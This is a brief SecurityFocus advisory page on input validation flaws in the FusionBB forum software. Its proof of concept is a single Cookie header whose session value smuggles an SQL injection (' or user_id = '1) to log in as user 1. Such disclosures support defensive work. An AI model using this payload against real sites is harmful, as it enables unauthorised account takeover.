info
discussion
exploit
solution
references
FusionBB Multiple Input Validation Vulnerabilities
An exploit is not required.
The following proof of concept is available:
Cookie: bb_session_id=' or user_id = '1; bb_uid=1;
Privacy Statement
Copyright 2010, SecurityFocus
